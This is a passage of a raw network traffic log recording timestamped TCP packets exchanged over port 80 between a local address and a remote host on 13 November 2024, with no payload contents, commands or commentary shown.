                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063179016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063193083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063193083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063251972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063370943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063383102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063390970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063400984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063412905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063422918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063425064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063457012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063457012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063496113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063504934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063534021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063743114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063754082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063762903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063774109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063788891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063790083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063800097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063815117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063827038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063853025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063863039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063872099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063882113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063905001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064080000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064090014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064099073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064109087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064120054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064122915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064122915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064129114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064137936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064146042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064157963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064168930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064168930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064184904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064196110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064204931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064214945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064218998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064218998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064224958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064244032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064265966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.064266920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100233078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100245953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100266933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100275040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100285053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100295067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100305080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100313902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100342035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100352049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100361109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100369930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100414991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100425005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100430012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100430012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100430012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100446939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100455046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100477934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.100477934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103255033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103266001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103276014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103298903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103308916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103324890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103328943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103334904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103353977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103501081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103511095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103522062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103532076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103543043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103553057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103563070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103570938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103570938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103574991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103598118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103598118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103624105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103651047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103662014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103671074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103683949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103693008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103704929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103715897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103724957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103730917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103733063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103733063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103739977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103749037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103753090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.103774071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.104162931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132909060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132919073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132927895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132936001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132958889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132967949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132977009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132985115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132985115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132985115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.132994890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133002996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133012056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133019924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133030891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133045912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133050919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133061886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133066893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133066893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133070946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133080959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133086920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133147955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133157015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133164883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133174896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133183002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133189917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133189917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133207083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133215904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133245945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133254051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133275032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133275032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133367062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133375883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133383989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133390903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133430004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.133430004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.138844967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.138854980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.138863087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.138938904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.138947010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.138956070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.138962984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.138972044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.139108896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.139118910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.139137030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.141161919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.160116911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.160125971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.160132885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.160140991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.160149097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.160156012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.160165071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.160170078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.160180092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161147118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161156893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161165953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161171913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161226034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161235094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161243916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161252975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161272049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161281109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161288977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161297083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161329985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.161458969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168052912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168061972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168071032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168091059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168101072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168108940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168212891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168212891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168348074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168355942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168365955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168386936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168396950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168406010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168462992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168462992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168909073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168917894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168926954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168962955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168972969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168981075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.168998957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169028997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169060946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169069052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169079065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169101000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169111013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169121027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169131994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169138908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169142962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169228077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169228077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169298887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169307947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169365883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169387102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169398069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169399977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169408083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169440031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169477940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169487000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169496059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169506073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169553995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169553995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169554949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169553995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169564009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169574022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169584036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169594049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169626951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169627905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169653893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169666052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169676065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169686079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169697046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169733047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169733047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.169733047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170063019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170072079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170080900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170089006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170098066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170108080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170119047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170128107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170137882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170144081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170147896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170156956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170173883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170176983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170176983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170178890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170183897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170192957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170195103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170202971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170212030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170221090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170231104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170255899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170258999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170265913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170274973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170284033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170295000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170304060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170305014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170305014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170312881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170320988 CET804973342.96.10.8192.168.2.4
